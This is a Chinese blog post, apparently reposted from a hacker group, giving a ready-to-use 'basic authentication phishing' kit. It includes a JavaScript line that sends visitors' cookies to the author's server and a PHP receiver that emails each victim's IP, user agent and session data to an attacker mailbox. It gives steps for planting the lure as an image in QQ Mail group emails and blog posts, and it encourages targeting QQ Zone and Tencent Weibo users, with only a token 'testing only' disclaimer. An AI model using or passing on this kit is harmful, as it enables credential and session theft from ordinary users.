想必关注网络信息安全的牛们早已知道基础认证钓鱼这点事儿了,没啥技术含量,但是在特定的条件下还是有点作用的。鄙人也吐槽几句吧。
注:全文仅作测试学习使用,请勿用作非法用途!
======转载请保留以下信息======
Author:blackeagle
Blog:www.blackeagle.name
From:HUC //cnhonker.com
====== 版权所有 侵权必究 ======
看本文之前建议大家先看看以下几篇文章:《当Discuz!遇上xsser.me》
www.wooyun.org/bugs/wooyun-2010-015248
《普通钓鱼已经远去,基础认证钓鱼悄然来临》
www.2cto.com/News/201212/172657.html
《基础认证钓鱼利用方法以及防范!》
www.irrsq.com/post-101.html
这个漏洞大家可以根据以下两个方法
1、《基础认证钓鱼利用方法以及防范!》
www.irrsq.com/post-101.html
这个帖子给的源码和信息 开始搭建自己的
这里提供鄙人修改的
www.blackeagle.name/xss.zip 点击下载
2、或者用已经配置好的也可以
http://qqaini.duapp.com/?u=xxxxxxxx=参数 这里的参数可自定义 如:test.jpg、ceshi.gif、dhl.mp3等等等等。。。
鄙人就把两个方法都给大家简单讲讲吧。
先说几个文件的配置吧,原创是笔墨写的,鄙人又改了改。
1.js
(new Image()).src = ‘http://www.blackeagle.name/xss/x.php?c=’ + document.cookie + ” location=” + document.location; //因为鄙人的接收文件都在xss目录下面 所以是/xss/
auth.php and f.js
改成自己的地址即可,其他无需变动。
x.php
<?php
$ip = $_SERVER[‘REMOTE_ADDR’];
$referer = $_SERVER[‘HTTP_REFERER’];
$agent = $_SERVER[‘HTTP_USER_AGENT’];
$data = $_GET[c];
$time = date(“Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer:
“.$referer.”<br>Session: “.$data.”<br><br><br>”;
require(“class.phpmailer.php”);
$mail = new PHPMailer();
$mail->CharSet = “UTF-8″;
$address =”xsscoming@qq.com”;//接收邮箱地址
$mail->IsSMTP(); // 使用SMTP方式发送
$mail->Host = “smtp.163.com”; // 您的邮箱域名
$mail->SMTPAuth = true; // 启用SMTP验证功能
$mail->Username = “xsssend@163.com”; // 邮箱用户名(请填写完整的email地址)
$mail->Password = “yourmailpwd”; // 邮箱密码
$mail->Port=25;
$mail->From = “xsssend@163.com”; //邮件发送者email地址
$mail->FromName = “xss sent!”;//邮件发送标题
$mail->AddAddress(“$address”, “a”);
$mail->IsHTML(true); //是否使用HTML格式
$mail->Subject = “xss coming!”; //邮件接收标题
$mail->Body = $text; //邮件内容,上面设置HTML,则可以是HTML。
if(!$mail->Send())
{
echo “邮件发送失败. <p>”;
echo “错误原因: ” . $mail->ErrorInfo;
exit;
}
?>
还有两个文件保持默认即可。
方法一、用个人博客钓
准备工作:
1、独立博客/空间(域名越好 钓鱼越成功)
2、利用文件(上面有写)
3、两个邮箱
开始:
测试1:QQ邮箱
打开“照片”后的倒三角,选择“网络照片”
填入我们已构造好的参数
http://www.blackeagle.name/xss/auth.php?r=test.jpg
确定,发送即可。访问一下群邮件看看。
测试2:笔者博客测试随便写个博文,类似如下图所示:
注:懂点html的都知道,这个是页面显示图片的img标签。因为test.jpg只是一个参数,不存在与www.blackeagle.name上的,所以不会显示图片。
访问一下:
输入test、blackeagle 看看收信情况:
成功收信。
方法二、用类似于xsser.me的平台钓
准备工作:
1、qqaini.duapp.com(注册帐号)
2、还有邮箱。开始:注册帐号啥的就不演示了,建立一个新项目先:
http://qqaini.duapp.com/?u=a6abe7&r=参数 //参数处自定义
这里笔者就用http://qqaini.duapp.com/?u=a6abe7&r=0.jpg 做测试
也是利用添加图片的方法,这里就不再演示了。看看效果:
查信:
当然,之前也有收到cookies的,就是不稳,有时候能收到,有时候收不到,求大牛讲解。
鄙人觉得最值得做测试(注:是测试啊!不是利用!)应该就是QQ空间的音乐和腾讯微博了。大家去玩吧^_^
毕竟玩QQ的访问这两个页面的次数太多太多……
转载请注明:jinglingshu的博客 » 基础认证钓鱼漏洞测试